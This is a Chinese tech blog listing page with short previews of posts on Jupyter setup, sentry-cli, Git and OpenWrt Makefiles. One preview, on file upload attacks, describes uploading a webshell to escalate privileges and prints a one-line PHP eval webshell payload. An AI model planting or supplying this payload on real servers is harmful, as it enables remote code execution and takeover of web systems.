xxxx
-
centos7.6搭建jupyternotebook教程
Centos7.6搭建jupyternotebook 注:root环境 一、下载安装Anaconda3 1、wget https://repo.continuum.io/archi…
-
文件上传
一句话木马:上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限 php一句话木马: <?php @eval($_POST[value]); ?&g…
-
sentry-cli 的 windows 安装
项目搭建时,发现在使用高版本 sentry-cli 上传 pdb 文件后会报 404 错误,同事猜测高版本的 sentry-cli 会返回错误的地址,建议我用低版本的试一下 依据教…
-
Git报错:You are in ‘detached HEAD‘ state, which means that you‘re not on any branch
如图: 解决办法 1.创建新的分支:git branch XXXX 2.切换到你的工作分支:git checkout XXXX 3.合并代码:git merget XXXX…
-
openWrt(LEDE):Makefile文件中$(eval $(call xxxx,xxx)) 作用
eval函数作用:eval函数实现各种定义。 $(eval $(call BuildPackage,libglog)) 调用 Profile 函数,其中令 PROFILE=…